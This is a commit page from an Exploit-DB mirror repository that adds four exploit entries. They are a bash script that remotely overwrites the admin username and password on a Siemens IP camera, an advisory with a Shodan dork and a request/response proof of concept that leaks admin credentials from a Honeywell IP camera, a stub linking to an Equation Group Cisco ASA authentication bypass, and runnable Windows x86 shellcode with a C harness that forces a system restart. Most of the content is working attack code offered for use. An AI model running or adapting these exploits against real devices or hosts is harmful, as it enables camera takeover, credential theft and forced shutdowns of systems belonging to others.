bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-08-19

Browse source 
4 new exploits

Too many too list!
This commit is contained in:
Offensive Security 2016-08-19 05:06:41 +00:00
parent 37ddb2eb21
commit ae53a02150
5 changed files with 2857 additions and 2036 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

4076
files.csv
View file

File diff suppressed because it is too large Load diff

44
platforms/cgi/webapps/40260.sh Executable file
View file

@ -0,0 +1,44 @@
#!/bin/bash
#
# SIEMENS IP Camera CCMW1025 x.2.2.1798 remote change admin user/password
#
# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
# http://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#
if [[ $# -gt 4 || $# -lt 3 ]]; then
echo " [ SIEMENS IP Camera CCMW1025 x.2.2.1798 remote change admin user/password"
echo " [ =================================================="
echo " [ Usage: $0 <target> <user> <password> <repeat password>"
echo " [ Example: $0 192.168.1.200:80 hacker teflon teflon"
echo " ["
echo " [ Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>"
echo " [ http://www.ethical-hacker.org/ https://www.facebook.com/ethicalhackerorg "
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " [ Error : libwww-perl not found =/"
exit;
fi
GET "http://$1/cgi-bin/writefile.cgi?DEFonoff_adm=&Adm_ID=$2&Adm_Pass1=$3&Adm_Pass2=$4&Language=en&Logoff_Time=0&UpSectionName=ADMINID" 0&> /dev/null <&1

59
platforms/cgi/webapps/40261.txt Executable file
View file

@ -0,0 +1,59 @@
1. Advisory Information
========================================
Title : Honeywell IP-Camera (HICC-1100PT) Unauthenticated Remote Credentials Disclosure
Vendor Homepage : https://www.asia.security.honeywell.com
Remotely Exploitable : Yes
Tested on Camera types : HICC-1100PT
Reference : https://www.asia.security.honeywell.com/Pages/product.aspx?category=720P-1.3M%20Box%20Camera&cat=HSG-ASIASECURITY&pid=HICC-1100T
Vulnerability : Username / Password Disclosure (Critical/High)
Shodan Dork : html:"Honeywell IP-Camera"
Date : 18/08/2016
Author : Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
2. CREDIT
========================================
This vulnerability was identified during penetration test by Yakir Wizman.
3. Description
========================================
Honeywell IP-Camera (HICC-1100PT) allows to unauthenticated user disclose the username & password remotely by simple request which made by browser.
4. Proof-of-Concept:
========================================
Simply go to the following url:
http://host:port/cgi-bin/readfile.cgi?query=ADMINID
Should return some javascript variable which contain the credentials and other configuration vars:
var Adm_ID="admin"; var Adm_Pass1=“admin”; var Adm_Pass2=“admin”; var Language=“en”; var Logoff_Time="0";
Request:
----------
GET /cgi-bin/readfile.cgi?query=ADMINID HTTP/1.1
Host: host:port
Connection: close
Response:
----------
HTTP/1.0 200 OK
Connection: close
Content-type: text/html
var Adm_ID="admin";
var Adm_Pass1=“admin”;
var Adm_Pass2=“admin”;
var Language=“en”;
var Logoff_Time="0";
Login @ http://host:port/cgi-bin/chklogin.cgi
5. SOLUTION
========================================
Contact the vendor for further information regarding the proper mitigation of this vulnerability.

17
platforms/hardware/remote/40258.txt Executable file
View file

@ -0,0 +1,17 @@
# Exploit Title: Cisco ASA 8.X Authentication Bypass
# Date: 17-08-2016
# Exploit Author: Equation Group
# Vendor Homepage: Cisco
# Software Link: Cisco
# Version: Cisco ASA 8.X
# Tested on: Cisco ASA 8.4.2
# CVE : Not sure
Requirements:
* SNMP read (public) string
* Access to SNMP service
* SSH port accessible
Full Exploit:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40258.zip

697
platforms/win_x86/shellcode/40259.c Executable file
View file

@ -0,0 +1,697 @@
/*
# Title: Windows x86 InitiateSystemShutdownA() shellcode
# Date : 18-08-2016
# Author : Roziul Hasan Khan Shifat
# Tested on : Windows 7 x86 starter
*/
/*
Disassembly of section .text:
00000000 <_start>:
0: 31 c9 xor %ecx,%ecx
2: 64 8b 41 30 mov %fs:0x30(%ecx),%eax
6: 8b 40 0c mov 0xc(%eax),%eax
9: 8b 70 14 mov 0x14(%eax),%esi
c: ad lods %ds:(%esi),%eax
d: 96 xchg %eax,%esi
e: ad lods %ds:(%esi),%eax
f: 8b 48 10 mov 0x10(%eax),%ecx
12: 8b 59 3c mov 0x3c(%ecx),%ebx
15: 01 cb add %ecx,%ebx
17: 8b 5b 78 mov 0x78(%ebx),%ebx
1a: 01 cb add %ecx,%ebx
1c: 8b 73 20 mov 0x20(%ebx),%esi
1f: 01 ce add %ecx,%esi
21: 31 d2 xor %edx,%edx
00000023 <g>:
23: 42 inc %edx
24: ad lods %ds:(%esi),%eax
25: 01 c8 add %ecx,%eax
27: 81 38 47 65 74 50 cmpl $0x50746547,(%eax)
2d: 75 f4 jne 23 <g>
2f: 81 78 04 72 6f 63 41 cmpl $0x41636f72,0x4(%eax)
36: 75 eb jne 23 <g>
38: 81 78 08 64 64 72 65 cmpl $0x65726464,0x8(%eax)
3f: 75 e2 jne 23 <g>
41: 8b 73 1c mov 0x1c(%ebx),%esi
44: 01 ce add %ecx,%esi
46: 8b 14 96 mov (%esi,%edx,4),%edx
49: 01 ca add %ecx,%edx
4b: 89 cf mov %ecx,%edi
4d: 31 c0 xor %eax,%eax
4f: 50 push %eax
50: 83 ec 1c sub $0x1c,%esp
53: 8d 34 24 lea (%esp),%esi
56: 89 16 mov %edx,(%esi)
58: 50 push %eax
59: 68 6f 6b 65 6e push $0x6e656b6f
5e: 68 65 73 73 54 push $0x54737365
63: 68 50 72 6f 63 push $0x636f7250
68: 68 4f 70 65 6e push $0x6e65704f
6d: 8d 04 24 lea (%esp),%eax
70: 50 push %eax
71: 51 push %ecx
72: ff d2 call *%edx
74: 89 46 04 mov %eax,0x4(%esi)
77: 83 c4 10 add $0x10,%esp
7a: 31 c9 xor %ecx,%ecx
7c: 68 73 41 42 42 push $0x42424173
81: 88 4c 24 01 mov %cl,0x1(%esp)
85: 68 6f 63 65 73 push $0x7365636f
8a: 68 6e 74 50 72 push $0x7250746e
8f: 68 75 72 72 65 push $0x65727275
94: 68 47 65 74 43 push $0x43746547
99: 8d 0c 24 lea (%esp),%ecx
9c: 51 push %ecx
9d: 57 push %edi
9e: 8b 16 mov (%esi),%edx
a0: ff d2 call *%edx
a2: 83 c4 14 add $0x14,%esp
a5: 89 46 08 mov %eax,0x8(%esi)
a8: 31 c9 xor %ecx,%ecx
aa: 68 65 73 73 41 push $0x41737365
af: 88 4c 24 03 mov %cl,0x3(%esp)
b3: 68 50 72 6f 63 push $0x636f7250
b8: 68 45 78 69 74 push $0x74697845
bd: 8d 0c 24 lea (%esp),%ecx
c0: 51 push %ecx
c1: 57 push %edi
c2: 8b 16 mov (%esi),%edx
c4: ff d2 call *%edx
c6: 83 c4 0c add $0xc,%esp
c9: 89 46 0c mov %eax,0xc(%esi)
cc: 31 c9 xor %ecx,%ecx
ce: 51 push %ecx
cf: 68 61 72 79 41 push $0x41797261
d4: 68 4c 69 62 72 push $0x7262694c
d9: 68 4c 6f 61 64 push $0x64616f4c
de: 8d 0c 24 lea (%esp),%ecx
e1: 51 push %ecx
e2: 57 push %edi
e3: 8b 16 mov (%esi),%edx
e5: ff d2 call *%edx
e7: 83 c4 0c add $0xc,%esp
ea: 68 2e 64 6c 6c push $0x6c6c642e
ef: 68 70 69 33 32 push $0x32336970
f4: 68 61 64 76 61 push $0x61766461
f9: 8d 0c 24 lea (%esp),%ecx
fc: 51 push %ecx
fd: ff d0 call *%eax
ff: 83 c4 0c add $0xc,%esp
102: 89 c7 mov %eax,%edi
104: 31 c9 xor %ecx,%ecx
106: 68 41 42 42 42 push $0x42424241
10b: 88 4c 24 01 mov %cl,0x1(%esp)
10f: 68 61 6c 75 65 push $0x65756c61
114: 68 65 67 65 56 push $0x56656765
119: 68 69 76 69 6c push $0x6c697669
11e: 68 75 70 50 72 push $0x72507075
123: 68 4c 6f 6f 6b push $0x6b6f6f4c
128: 8d 0c 24 lea (%esp),%ecx
12b: 51 push %ecx
12c: 50 push %eax
12d: 8b 16 mov (%esi),%edx
12f: ff d2 call *%edx
131: 83 c4 18 add $0x18,%esp
134: 89 46 10 mov %eax,0x10(%esi)
137: 31 c9 xor %ecx,%ecx
139: 68 73 41 41 41 push $0x41414173
13e: 88 4c 24 01 mov %cl,0x1(%esp)
142: 68 6c 65 67 65 push $0x6567656c
147: 68 72 69 76 69 push $0x69766972
14c: 68 6b 65 6e 50 push $0x506e656b
151: 68 73 74 54 6f push $0x6f547473
156: 68 41 64 6a 75 push $0x756a6441
15b: 8d 0c 24 lea (%esp),%ecx
15e: 51 push %ecx
15f: 57 push %edi
160: 8b 16 mov (%esi),%edx
162: ff d2 call *%edx
164: 83 c4 18 add $0x18,%esp
167: 89 46 14 mov %eax,0x14(%esi)
16a: 31 c9 xor %ecx,%ecx
16c: 68 77 6e 41 42 push $0x42416e77
171: 88 4c 24 03 mov %cl,0x3(%esp)
175: 68 75 74 64 6f push $0x6f647475
17a: 68 65 6d 53 68 push $0x68536d65
17f: 68 53 79 73 74 push $0x74737953
184: 68 69 61 74 65 push $0x65746169
189: 68 49 6e 69 74 push $0x74696e49
18e: 8d 0c 24 lea (%esp),%ecx
191: 51 push %ecx
192: 57 push %edi
193: 8b 16 mov (%esi),%edx
195: ff d2 call *%edx
197: 83 c4 18 add $0x18,%esp
19a: 89 46 18 mov %eax,0x18(%esi)
19d: 31 c0 xor %eax,%eax
19f: 50 push %eax
1a0: 83 ec 14 sub $0x14,%esp
1a3: 8d 3c 24 lea (%esp),%edi
000001a6 <proc_start>:
1a6: 8b 46 08 mov 0x8(%esi),%eax
1a9: ff d0 call *%eax
1ab: 31 d2 xor %edx,%edx
1ad: 8d 17 lea (%edi),%edx
1af: 52 push %edx
1b0: 31 c9 xor %ecx,%ecx
1b2: b1 28 mov $0x28,%cl
1b4: 51 push %ecx
1b5: 50 push %eax
1b6: 8b 4e 04 mov 0x4(%esi),%ecx
1b9: ff d1 call *%ecx
1bb: 8d 57 04 lea 0x4(%edi),%edx
1be: 8d 52 04 lea 0x4(%edx),%edx
1c1: 8d 12 lea (%edx),%edx
1c3: 31 c9 xor %ecx,%ecx
1c5: 68 65 67 65 41 push $0x41656765
1ca: 88 4c 24 03 mov %cl,0x3(%esp)
1ce: 68 69 76 69 6c push $0x6c697669
1d3: 68 77 6e 50 72 push $0x72506e77
1d8: 68 75 74 64 6f push $0x6f647475
1dd: 68 53 65 53 68 push $0x68536553
1e2: 8d 0c 24 lea (%esp),%ecx
1e5: 31 db xor %ebx,%ebx
1e7: 52 push %edx
1e8: 51 push %ecx
1e9: 53 push %ebx
1ea: 8b 5e 10 mov 0x10(%esi),%ebx
1ed: ff d3 call *%ebx
1ef: 8d 57 04 lea 0x4(%edi),%edx
1f2: 31 c9 xor %ecx,%ecx
1f4: 41 inc %ecx
1f5: 89 0a mov %ecx,(%edx)
1f7: 8d 52 04 lea 0x4(%edx),%edx
1fa: 41 inc %ecx
1fb: 89 4a 08 mov %ecx,0x8(%edx)
1fe: 31 d2 xor %edx,%edx
200: 52 push %edx
201: 52 push %edx
202: 52 push %edx
203: 8d 57 04 lea 0x4(%edi),%edx
206: 52 push %edx
207: 31 d2 xor %edx,%edx
209: 52 push %edx
20a: 8b 17 mov (%edi),%edx
20c: 52 push %edx
20d: 8b 56 14 mov 0x14(%esi),%edx
210: ff d2 call *%edx
212: 31 c9 xor %ecx,%ecx
214: 51 push %ecx
215: 68 6e 64 73 21 push $0x2173646e
21a: 68 73 65 63 6f push $0x6f636573
21f: 68 41 20 33 20 push $0x20332041
224: 68 6d 2e 45 54 push $0x54452e6d
229: 68 79 73 74 65 push $0x65747379
22e: 68 6e 67 20 53 push $0x5320676e
233: 68 61 72 74 49 push $0x49747261
238: 68 52 65 73 74 push $0x74736552
23d: 8d 1c 24 lea (%esp),%ebx
240: 41 inc %ecx
241: 51 push %ecx
242: 31 c9 xor %ecx,%ecx
244: 51 push %ecx
245: b1 03 mov $0x3,%cl
247: 51 push %ecx
248: 53 push %ebx
249: 31 c9 xor %ecx,%ecx
24b: 51 push %ecx
24c: 8b 4e 18 mov 0x18(%esi),%ecx
24f: ff d1 call *%ecx
251: 8b 4e 0c mov 0xc(%esi),%ecx
254: 50 push %eax
255: ff d1 call *%ecx
*/
/*
HANDLE 4 bytes
TOKEN_PRIVILEGES 16 bytes
TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY = 40
LUID_AND_ATTRIBUTES 12 bytes
LUID 8 bytes
SE_SHUTDOWN_NAME = "SeShutdownPrivilege"
SE_PRIVILEGE_ENABLED = 2
required functions:
1. WINADVAPI WINBOOL WINAPI OpenProcessToken (HANDLE ProcessHandle, DWORD DesiredAccess, PHANDLE TokenHandle);
2. WINBASEAPI HANDLE WINAPI GetCurrentProcess (VOID);
3. WINADVAPI WINBOOL WINAPI LookupPrivilegeValueA (LPCSTR lpSystemName, LPCSTR lpName, PLUID lpLuid);
4. WINADVAPI WINBOOL WINAPI AdjustTokenPrivileges (HANDLE TokenHandle, WINBOOL DisableAllPrivileges, PTOKEN_PRIVILEGES NewState, DWORD BufferLength, PTOKEN_PRIVILEGES PreviousState, PDWORD ReturnLength);
5. WINADVAPI WINBOOL WINAPI InitiateSystemShutdownA(LPSTR lpMachineName,LPSTR lpMessage,DWORD dwTimeout,WINBOOL bForceAppsClosed,WINBOOL bRebootAfterShutdown);
6.GetProcAddress()
7.ExitProcess()
8.LoadLibraryA() [1 time use]
required dll:
1.kernel32.dll
2.kernel32.dll
3.advapi32.dll
4.advapi32.dll
5.advapi32.dll
6.kernel32.dll
7.kernel32.dll
8.kernel32.dll
required macro and custom data types:
#define ANYSIZE_ARRAY 1
typedef struct _TOKEN_PRIVILEGES {
DWORD PrivilegeCount;
LUID_AND_ATTRIBUTES Privileges[ANYSIZE_ARRAY];
} TOKEN_PRIVILEGES,*PTOKEN_PRIVILEGES;
typedef struct _LUID_AND_ATTRIBUTES {
LUID Luid;
DWORD Attributes;
} LUID_AND_ATTRIBUTES,*PLUID_AND_ATTRIBUTES;
typedef LUID_AND_ATTRIBUTES LUID_AND_ATTRIBUTES_ARRAY[ANYSIZE_ARRAY];
typedef LUID_AND_ATTRIBUTES_ARRAY *PLUID_AND_ATTRIBUTES_ARRAY;
typedef struct _LUID {
DWORD LowPart;
LONG HighPart;
} LUID,*PLUID;
c code:
#include <windows.h>
#include<stdio.h>
#include<process.h>
#include<io.h>
int main(){
HANDLE h;
TOKEN_PRIVILEGES t;
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,&h))
return 0;
LookupPrivilegeValue(NULL,SE_SHUTDOWN_NAME,&t.Privileges[0].Luid);
t.PrivilegeCount=1;
t.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(h, FALSE, &t, 0,NULL, 0);
InitiateSystemShutdown(NULL,"shutting",10,FALSE,1);
}
*/
/*
section .text
global _start
_start:
xor ecx,ecx
mov eax,[fs:ecx+0x30] ;PEB
mov eax,[eax+0xc] ;PEB->Ldr
mov esi,[eax+0x14] ;PEB->ldr.InMemOrderModuleList
lodsd
xchg esi,eax
lodsd
mov ecx,[eax+0x10] ;kernel32.dll base address
mov ebx,[ecx+0x3c] ;DOS->elf_anew
add ebx,ecx ;PE HEADER
mov ebx,[ebx+0x78] ;DataDirectory->VirtualAddress
add ebx,ecx ;IMAGE_EXPORT_DIRECTORY
mov esi,[ebx+0x20] ;AddressOfNames
add esi,ecx
xor edx,edx
g:
inc edx
lodsd
add eax,ecx
cmp dword [eax],'GetP'
jnz g
cmp dword [eax+4],'rocA'
jnz g
cmp dword [eax+8],'ddre'
jnz g
mov esi,[ebx+0x1c] ;AddressOfFunctions
add esi,ecx
mov edx,[esi+edx*4]
add edx,ecx ;GetProcAddress()
mov edi,ecx ;kernel32.dll
xor eax,eax
push eax
sub esp,28
lea esi,[esp]
mov [esi],dword edx ;GetProcAddress() at offset 0
;---------------------------------
;finding address of OpenProcessToken()
push eax
push 0x6e656b6f
push 0x54737365
push 0x636f7250
push 0x6e65704f
lea eax,[esp]
push eax
push ecx
call edx
;-----------------------------------
mov [esi+4],dword eax ;OpenProcessToken() at offset 4
add esp,0x10
;-------------------------
;finding address of GetCurrentProcess()
xor ecx,ecx
push 0x42424173
mov [esp+1],byte cl
push 0x7365636f
push 0x7250746e
push 0x65727275
push 0x43746547
lea ecx,[esp]
push ecx
push edi
mov edx,dword [esi]
call edx
;-------------------------
add esp,20
mov [esi+8],dword eax ;GetCurrentProcess() at offset 8
;----------------------------------
;finding address of ExitProcess()
xor ecx,ecx
push 0x41737365
mov [esp+3],byte cl
push 0x636f7250
push 0x74697845
lea ecx,[esp]
push ecx
push edi
mov edx,dword [esi]
call edx
;-----------------------
add esp,12
mov [esi+12],dword eax ;ExitProcess() at offset 12
;-------------------------------------------
;finding address of LoadLibraryA()
xor ecx,ecx
push ecx
push 0x41797261
push 0x7262694c
push 0x64616f4c
lea ecx,[esp]
push ecx
push edi
mov edx,dword [esi]
call edx
;--------------------
add esp,12
;LoadLibraryA("advapi32.dll")
push 0x6c6c642e
push 0x32336970
push 0x61766461
lea ecx,[esp]
push ecx
call eax
;--------------------------
add esp,12
mov edi,eax ; advapi32.dll
;------------------------------
;finding address of LookupPrivilegeValueA()
xor ecx,ecx
push 0x42424241
mov [esp+1],byte cl
push 0x65756c61
push 0x56656765
push 0x6c697669
push 0x72507075
push 0x6b6f6f4c
lea ecx,[esp]
push ecx
push eax
mov edx,dword [esi]
call edx
;---------------------------
add esp,0x18
mov [esi+16],dword eax ;LookupPrivilegeValueA() at offset 16
;-------------------------
;finding address of AdjustTokenPrivileges()
xor ecx,ecx
push 0x41414173
mov [esp+1],byte cl
push 0x6567656c
push 0x69766972
push 0x506e656b
push 0x6f547473
push 0x756a6441
lea ecx,[esp]
push ecx
push edi
mov edx,dword [esi]
call edx
;------------------------------------
add esp,0x18
mov [esi+20],dword eax ;AdjustTokenPrivileges() at offset 20
;---------------------------
;finding address of InitiateSystemShutdownA()
xor ecx,ecx
push 0x42416e77
mov [esp+3],byte cl
push 0x6f647475
push 0x68536d65
push 0x74737953
push 0x65746169
push 0x74696e49
lea ecx,[esp]
push ecx
push edi
mov edx,dword [esi]
call edx
;-------------------------
add esp,0x18
mov [esi+24],dword eax ;InitiateSystemShutdownA() at offset 24
;-------------------------
xor eax,eax
push eax
sub esp,20
lea edi,[esp] ;HANDLE+TOKEN_PRIVILEGES address
;---------------------------------
;GetProcAddress() at offset 0
;OpenProcessToken() at offset 4
;GetCurrentProcess() at offset 8
;ExitProcess() at offset 12
;LookupPrivilegeValueA() at offset 16
;AdjustTokenPrivileges() at offset 20
;InitiateSystemShutdownA() at offset 24
;----------------------------------------
proc_start:
;---------------------------
;GetCurrentProcess()
mov eax,[esi+8]
call eax
;----------------------------
;OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,&HANDLE)
xor edx,edx
lea edx,[edi]
push edx
xor ecx,ecx
mov cl,40
push ecx
push eax
mov ecx,[esi+4]
call ecx
;--------------------------
;LookupPrivilegeValueA(NULL,SE_SHUTDOWN_NAME,&TOKEN_PRIVILEGES.Privileges[0].Luid);
lea edx,[edi+4]
lea edx,[edx+4]
lea edx,[edx]
xor ecx,ecx
push 0x41656765
mov [esp+3],byte cl
push 0x6c697669
push 0x72506e77
push 0x6f647475
push 0x68536553
lea ecx,[esp]
xor ebx,ebx
push edx
push ecx
push ebx
mov ebx,[esi+16]
call ebx
;----------------------------------
;AdjustTokenPrivileges(HANDLE, FALSE, &TOKEN_PRIVILEGES, 0,NULL, 0);
lea edx,[edi+4]
xor ecx,ecx
inc ecx
mov [edx],dword ecx
lea edx,[edx+4]
inc ecx
mov [edx+8],dword ecx
xor edx,edx
push edx
push edx
push edx
lea edx,[edi+4]
push edx
xor edx,edx
push edx
mov edx,dword [edi]
push edx
mov edx,[esi+20]
call edx
;----------------------------
;InitiateSystemShutdownA(NULL,"RestartIng System.ETA 3 seconds!",3,FALSE,1);
xor ecx,ecx
;--------------------------
push ecx
push 0x2173646e
push 0x6f636573
push 0x20332041
push 0x54452e6d
push 0x65747379
push 0x5320676e
push 0x49747261
push 0x74736552
lea ebx,[esp] ;Message "RestartIng System.ETA 3 seconds!"
;------------------------------
inc ecx ;if U want to shutdown system , just remove this line
push ecx
xor ecx,ecx
push ecx
mov cl,3 ;3 seconds
push ecx
push ebx
xor ecx,ecx
push ecx
mov ecx,[esi+24]
call ecx
;--------------------------
;Exiting
mov ecx,[esi+12]
push eax
call ecx
*/
#include<stdio.h>
#include<string.h>
char shellcode[]=\
"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x89\xcf\x31\xc0\x50\x83\xec\x1c\x8d\x34\x24\x89\x16\x50\x68\x6f\x6b\x65\x6e\x68\x65\x73\x73\x54\x68\x50\x72\x6f\x63\x68\x4f\x70\x65\x6e\x8d\x04\x24\x50\x51\xff\xd2\x89\x46\x04\x83\xc4\x10\x31\xc9\x68\x73\x41\x42\x42\x88\x4c\x24\x01\x68\x6f\x63\x65\x73\x68\x6e\x74\x50\x72\x68\x75\x72\x72\x65\x68\x47\x65\x74\x43\x8d\x0c\x24\x51\x57\x8b\x16\xff\xd2\x83\xc4\x14\x89\x46\x08\x31\xc9\x68\x65\x73\x73\x41\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x8d\x0c\x24\x51\x57\x8b\x16\xff\xd2\x83\xc4\x0c\x89\x46\x0c\x31\xc9\x51\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x8d\x0c\x24\x51\x57\x8b\x16\xff\xd2\x83\xc4\x0c\x68\x2e\x64\x6c\x6c\x68\x70\x69\x33\x32\x68\x61\x64\x76\x61\x8d\x0c\x24\x51\xff\xd0\x83\xc4\x0c\x89\xc7\x31\xc9\x68\x41\x42\x42\x42\x88\x4c\x24\x01\x68\x61\x6c\x75\x65\x68\x65\x67\x65\x56\x68\x69\x76\x69\x6c\x68\x75\x70\x50\x72\x68\x4c\x6f\x6f\x6b\x8d\x0c\x24\x51\x50\x8b\x16\xff\xd2\x83\xc4\x18\x89\x46\x10\x31\xc9\x68\x73\x41\x41\x41\x88\x4c\x24\x01\x68\x6c\x65\x67\x65\x68\x72\x69\x76\x69\x68\x6b\x65\x6e\x50\x68\x73\x74\x54\x6f\x68\x41\x64\x6a\x75\x8d\x0c\x24\x51\x57\x8b\x16\xff\xd2\x83\xc4\x18\x89\x46\x14\x31\xc9\x68\x77\x6e\x41\x42\x88\x4c\x24\x03\x68\x75\x74\x64\x6f\x68\x65\x6d\x53\x68\x68\x53\x79\x73\x74\x68\x69\x61\x74\x65\x68\x49\x6e\x69\x74\x8d\x0c\x24\x51\x57\x8b\x16\xff\xd2\x83\xc4\x18\x89\x46\x18\x31\xc0\x50\x83\xec\x14\x8d\x3c\x24\x8b\x46\x08\xff\xd0\x31\xd2\x8d\x17\x52\x31\xc9\xb1\x28\x51\x50\x8b\x4e\x04\xff\xd1\x8d\x57\x04\x8d\x52\x04\x8d\x12\x31\xc9\x68\x65\x67\x65\x41\x88\x4c\x24\x03\x68\x69\x76\x69\x6c\x68\x77\x6e\x50\x72\x68\x75\x74\x64\x6f\x68\x53\x65\x53\x68\x8d\x0c\x24\x31\xdb\x52\x51\x53\x8b\x5e\x10\xff\xd3\x8d\x57\x04\x31\xc9\x41\x89\x0a\x8d\x52\x04\x41\x89\x4a\x08\x31\xd2\x52\x52\x52\x8d\x57\x04\x52\x31\xd2\x52\x8b\x17\x52\x8b\x56\x14\xff\xd2\x31\xc9\x51\x68\x6e\x64\x73\x21\x68\x73\x65\x63\x6f\x68\x41\x20\x33\x20\x68\x6d\x2e\x45\x54\x68\x79\x73\x74\x65\x68\x6e\x67\x20\x53\x68\x61\x72\x74\x49\x68\x52\x65\x73\x74\x8d\x1c\x24\x41\x51\x31\xc9\x51\xb1\x03\x51\x53\x31\xc9\x51\x8b\x4e\x18\xff\xd1\x8b\x4e\x0c\x50\xff\xd1";
main()
{
printf("shellcode lenght %ld\n",(long)strlen(shellcode));
(* (int(*)()) shellcode) ();
}